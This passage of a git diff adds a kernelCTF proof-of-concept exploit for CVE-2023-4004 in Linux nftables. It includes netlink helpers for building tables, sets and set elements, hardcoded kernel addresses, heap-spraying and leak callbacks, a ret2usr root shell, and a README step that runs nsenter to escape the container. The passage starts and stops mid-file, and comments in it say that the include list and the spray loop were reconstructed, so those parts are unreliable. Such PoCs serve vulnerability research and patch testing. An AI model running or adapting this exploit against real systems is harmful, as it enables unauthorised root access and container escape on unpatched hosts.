uint32_t ulen){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWSETELEM),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + struct nl_msg *elem = nlmsg_alloc(); + struct nl_msg *elem_nest = nlmsg_alloc(); + struct nl_msg *elem_key = nlmsg_alloc(); + struct nl_msg *elem_end = nlmsg_alloc(); + char *key = malloc(0x40); + char *key_end = malloc(0x40); + memset(key,0xff,0x40); + memset(key_end,0xff,0x40); + nla_put(elem_key, NFTA_DATA_VALUE, 0x40, key); + nla_put_nested(elem_nest, NFTA_SET_ELEM_KEY, elem_key); + nla_put_string(elem_nest, NFTA_SET_ELEM_OBJREF, OBJ_FOR_REF); + //nla_put_u32(elem_nest, NFTA_SET_ELEM_FLAGS, htonl(NFT_SET_ELEM_CATCHALL)); + if(udata>0){ + nla_put(elem_nest, NFTA_SET_ELEM_USERDATA, ulen, udata); + } + + nla_put_nested(elem, 1, elem_nest); + + nla_put_string(msg2, NFTA_SET_ELEM_LIST_TABLE, table_name); + nla_put_string(msg2, NFTA_SET_ELEM_LIST_SET, set_name); + nla_put_nested(msg2, NFTA_SET_ELEM_LIST_ELEMENTS, elem); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create setelem\n"); + } +} + + +void del_setelem(struct nl_sock * socket){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_DELSETELEM),// TYPE + sizeof(struct 
nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + struct nl_msg *elem = nlmsg_alloc(); + struct nl_msg *elem_nest = nlmsg_alloc(); + struct nl_msg *elem_key = nlmsg_alloc(); + char *key = malloc(0x40); + memset(key,0x41,0x40); + nla_put(elem_key, NFTA_DATA_VALUE, 0x40, key); + nla_put_nested(elem_nest, NFTA_SET_ELEM_KEY, elem_key); + //nla_put_string(elem_nest, NFTA_SET_ELEM_OBJREF, "test-obj2"); + + nla_put_nested(elem, 1, elem_nest); + + nla_put_string(msg2, NFTA_SET_ELEM_LIST_TABLE, "test_table"); + nla_put_string(msg2, NFTA_SET_ELEM_LIST_SET, "test_set"); + nla_put_nested(msg2, NFTA_SET_ELEM_LIST_ELEMENTS, elem); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len)*2 + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len), hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len), hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len)*2, hdr3, NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + printf("Delete setelem\n"); + } +} + +void elem_flush(struct nl_sock * socket, char *table_name, char *set_name){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_DELSETELEM),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + nla_put_string(msg2, NFTA_SET_ELEM_LIST_TABLE, table_name); + nla_put_string(msg2, NFTA_SET_ELEM_LIST_SET, set_name); + + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + 
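+    // a DELSETELEM message carrying no NFTA_SET_ELEM_LIST_ELEMENTS attribute asks the kernel to flush every element of the set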
memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Flush set\n"); + } +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/spec.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/spec.h new file mode 100644 index 00000000..5b4fe427 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/spec.h @@ -0,0 +1,2 @@ +#define INIT_CRED 0xFFFFFFFF83676800 +#define MODULE_CT_EXPECT_OBJ_TYPE_ADDR 0xFFFFFFFF83962580 diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/table.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/table.h new file mode 100644 index 00000000..a623f956 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/table.h @@ -0,0 +1,197 @@ +void new_table(struct nl_sock * socket, char *name){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2;//NFPROTO_IPV4; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWTABLE),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + nla_put_string(msg2, NFTA_TABLE_NAME, name); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create table\n"); + } +} + +void new_table_with_udata(struct nl_sock * socket, char *name,char *udata, int len){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = 
malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2;//NFPROTO_IPV4; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWTABLE),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + nla_put_string(msg2, NFTA_TABLE_NAME, name); + nla_put(msg2,NFTA_TABLE_USERDATA,len,udata); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create table\n"); + } +} + +void get_table(struct nl_sock * socket, char *name){ + //init msg + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + nfnlmsg_put( + msg, + NL_AUTO_PID, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_SUBSYS_NFTABLES, //SUBSYS + NFT_MSG_GETTABLE, // TYPE + NLM_F_REQUEST, //NLM_F_ECHO + 2, //FAMILY + 0 //RES_ID + ); + //init msg + nla_put_string(msg, NFTA_TABLE_NAME, name); + + int res = nl_send_auto(socket, msg); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Get table %s\n",name); + } +} +void del_table(struct nl_sock * socket, char *table_name){ + + struct nl_msg * msg = nlmsg_alloc(); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_DELTABLE),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + 
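+    // batch assembled as BEGIN / DELTABLE / END; only the table name attribute is attached below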
+    //init msg
+
+    nla_put_string(msg2, NFTA_TABLE_NAME, table_name);
+
+    uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len);
+    char *buf = malloc(total_size);
+    memset(buf,0,total_size);
+    memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len));
+    memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len));
+    memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len));
+    int res = nl_sendto(socket, buf, total_size);
+    nlmsg_free(msg);
+    if (res < 0) {
+        fprintf(stderr, "sending message failed\n");
+    } else {
+        //printf("Delete table %s\n",table_name);
+    }
+
+}
diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/Makefile b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/Makefile
new file mode 100644
index 00000000..e2a6e2ce
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/Makefile
@@ -0,0 +1,9 @@
+exploit:
+	gcc -o exploit exploit.c -I/usr/include/libnl3 -lnl-nf-3 -lnl-route-3 -lnl-3 -static
+prerequisites:
+	sudo apt-get install libnl-nf-3-dev
+run:
+	./exploit
+
+clean:
+	rm exploit
diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/README b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/README
new file mode 100644
index 00000000..4945bb0b
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/README
@@ -0,0 +1,2 @@
+Exploit for the kernelCTF mitigation-6.1-v2 instance.
+Run the command "nsenter --target 1 -m -p" after running the PoC.
diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/chain.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/chain.h
new file mode 100644
index 00000000..4245eb47
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/chain.h
@@ -0,0 +1,56 @@
+void new_chain(struct nl_sock * socket, char *table_name, char *chain_name){
+    struct nl_msg * msg = nlmsg_alloc();
+    //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE);
+    struct nlmsghdr *hdr1 = nlmsg_put(
+        msg,
+        NL_AUTO_PORT, // auto assign current pid
+        NL_AUTO_SEQ, // begin wit seq number 0
+        NFNL_MSG_BATCH_BEGIN, // TYPE
+        sizeof(struct nfgenmsg),
+        NLM_F_REQUEST //NLM_F_ECHO
+    );
+    struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg));
+    h->nfgen_family = 2;//NFPROTO_IPV4;
+    h->version = 0;
+    h->res_id = NFNL_SUBSYS_NFTABLES;
+    memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg));
+
+    struct nl_msg * msg2 = nlmsg_alloc();
+    struct nlmsghdr *hdr2 = nlmsg_put(
+        msg2,
+        NL_AUTO_PORT, // auto assign current pid
+        NL_AUTO_SEQ, // begin wit seq number 0
+        (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWCHAIN),// TYPE
+        sizeof(struct nfgenmsg),
+        NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO
+    );
+    struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg));
+    h2->nfgen_family = 2;//NFPROTO_IPV4;
+    h2->version = 0;
+    h2->res_id = NFNL_SUBSYS_NFTABLES;
+    memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg));
+    struct nl_msg * msg3 = nlmsg_alloc();
+    struct nlmsghdr *hdr3 = nlmsg_put(
+        msg3,
+        NL_AUTO_PORT, // auto assign current pid
+        NL_AUTO_SEQ, // begin wit seq number 0
+        NFNL_MSG_BATCH_END,// TYPE
+        sizeof(struct nfgenmsg),
+        NLM_F_REQUEST //NLM_F_ECHO
+    );
+    nla_put_string(msg2, NFTA_CHAIN_TABLE, table_name);
+    nla_put_string(msg2, NFTA_CHAIN_NAME, chain_name);
+    uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len);
+    char *buf = malloc(total_size);
+    memset(buf,0,total_size);
+    memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len));
+    memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len));
+    memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len));
+    int res = nl_sendto(socket, buf, total_size);
+    nlmsg_free(msg);
+    if (res < 0) {
+        fprintf(stderr, "sending message failed\n");
+    } else {
+        printf("Create chain %s\n",chain_name);
+    }
+}
diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/exploit b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/exploit
new file mode 100755
index 00000000..08f9fe0a
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/exploit differ
diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/exploit.c b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/exploit.c
new file mode 100644
index 00000000..beb4654e
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/exploit.c
@@ -0,0 +1,363 @@
+#define _GNU_SOURCE
+/* header names were lost in extraction; the same assumed set as in the lts-6.1.36 exploit (libc + libnl3 + nftables netlink uAPI) */
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <sched.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <errno.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/wait.h>
+#include <arpa/inet.h>
+#include <linux/netlink.h>
+#include <linux/netfilter.h>
+#include <linux/netfilter/nfnetlink.h>
+#include <linux/netfilter/nf_tables.h>
+#include <linux/netfilter/nf_conntrack_common.h>
+#include <netlink/netlink.h>
+#include <netlink/socket.h>
+#include <netlink/msg.h>
+#include <netlink/attr.h>
+#include <netlink/netfilter/nfnl.h>
+
+#include "obj.h"
+#include "setelem.h"
+#include "table.h"
+#include "set.h"
+#include "rule.h"
+#include "chain.h"
+#include "spec.h"
+#define THREAD_MAX_NUM 100
+#define SET_TABLE "set-table"
+#define OBJ_FOR_REF "obj-for-ref"
+#define OBJ_TABLE "obj-table"
+
+char *leak_obj=NULL;
+char *target_table=NULL;
+char *leak_data=NULL;
+int ct_expect_obj_num = 0;
+int table_num = 0;
+
+unsigned long user_cs,user_ss,user_rsp,user_rflags;
+uint64_t kernel_off, module_base, type_addr, prepare_kernel_cred, commit_creds;
+uint64_t set_num = 0;
+static void save_state() {
+    asm(
+    "movq %%cs, %0\n"
+    "movq %%ss, %1\n"
+    "movq %%rsp, %2\n"
+    "pushfq\n"
+    "popq %3\n"
+    : "=r" (user_cs), "=r" (user_ss), "=r" (user_rsp),"=r" (user_rflags) : : "memory");
+}
+
+
+void shell(){
+    printf("ret2usr success! uid : %d\n",getuid());
+
+    char *args[] = {"/bin/sh", "-i", NULL};
+    //char *args[] = {"/bin/sh", "-c", "nsenter --target 1 -m -p;/bin/bash",NULL};
+    execve(args[0], args, NULL);
+}
+
+int nl_callback_find_target_table(struct nl_msg* recv_msg, void* arg)
+{
+
+    struct nlmsghdr * ret_hdr = nlmsg_hdr(recv_msg);
+    struct nlattr * tb_msg[NFTA_TABLE_MAX+1];
+    memset(tb_msg,0,sizeof(tb_msg));
+
+    if (ret_hdr->nlmsg_type == NLMSG_ERROR) {
+        //fprintf(stderr, "Received NLMSG_ERROR message!\n");
+        return NL_STOP;
+    }
+
+    struct nlattr *attr = (void *)ret_hdr + nlmsg_total_size(sizeof(struct nfgenmsg));
+    int attrlen = ret_hdr->nlmsg_len - nlmsg_total_size(sizeof(struct nfgenmsg));
+    nla_parse(tb_msg, NFTA_TABLE_MAX, attr, attrlen, NULL);
+    char * table_name=NULL;
+    if (tb_msg[NFTA_TABLE_NAME]) {
+        table_name = nla_get_string(tb_msg[NFTA_TABLE_NAME]);
+        //printf("Get table: '%s'\n", table_name );
+    }
+    if (tb_msg[NFTA_TABLE_USERDATA]){
+        uint64_t * val = malloc(nla_len(tb_msg[NFTA_TABLE_USERDATA]));
+        nla_memcpy(val, tb_msg[NFTA_TABLE_USERDATA], nla_len(tb_msg[NFTA_TABLE_USERDATA]));
+        //printf("data[0] = %lx\n", val[0]);
+        if((val[0]&0xfffffffffffff000)!= 0x4c00000000000000 && val[0] != 0){
+            printf("Get table: '%s'\n", table_name );
+            printf("data[0] = %lx\n", val[0]);
+            leak_obj = (char *)val;
+            target_table = malloc(strlen(table_name)+1);
+            strcpy(target_table,table_name);
+            leak_data = (char *)val;
+        }
+    }
+    return NL_OK;
+}
+
+
+int nl_callback_for_obj(struct nl_msg* recv_msg, void* arg)
+{
+
+    struct nlmsghdr * ret_hdr = nlmsg_hdr(recv_msg);
+    struct nlattr * tb_msg[NFTA_OBJ_MAX+1];
+    memset(tb_msg,0,sizeof(tb_msg));
+
+    if (ret_hdr->nlmsg_type == NLMSG_ERROR) {
+        //fprintf(stderr, "Received NLMSG_ERROR message!\n");
+        return NL_STOP;
+    }
+
+    struct nlattr *attr = (void *)ret_hdr + nlmsg_total_size(sizeof(struct nfgenmsg));
+    int attrlen = ret_hdr->nlmsg_len - nlmsg_total_size(sizeof(struct nfgenmsg));
+    nla_parse(tb_msg, NFTA_OBJ_MAX, attr, attrlen, NULL);
+    char * obj_name=NULL;
+    if (tb_msg[NFTA_OBJ_NAME]) {
+        obj_name = nla_get_string(tb_msg[NFTA_OBJ_NAME]);
+        printf("Get obj: '%s'\n", obj_name );
+    }
+    if (tb_msg[NFTA_OBJ_USERDATA]){
+        uint64_t * val = malloc(nla_len(tb_msg[NFTA_OBJ_USERDATA]));
+        nla_memcpy(val, tb_msg[NFTA_OBJ_USERDATA], nla_len(tb_msg[NFTA_OBJ_USERDATA]));
+        printf("data[0] = %lx\n", val[0]);
+        leak_data = (char *)val;
+    }
+    return NL_OK;
+}
+
+
+int setup_sandbox(void) {
+    if (unshare(CLONE_NEWUSER) < 0) {
+        perror("[-] unshare(CLONE_NEWUSER)");
+        return -1;
+    }
+    if (unshare(CLONE_NEWNET) < 0) {
+        perror("[-] unshare(CLONE_NEWNET)");
+        return -1;
+    }
+    return 0;
+}
+
+void spray_tables(struct nl_sock * socket, int len, char *udata, int size){
+    char *tmp = malloc(0x100);
+    memset(tmp,0,0x100);
+    int i;
+    for(i=0;i<len;i++){
+        /* loop body reconstructed (span lost in extraction); the table-name pattern is an assumption */
+        sprintf(tmp,"table-%d",i);
+        new_table_with_udata(socket,tmp,udata,size);
+    }
+}
+
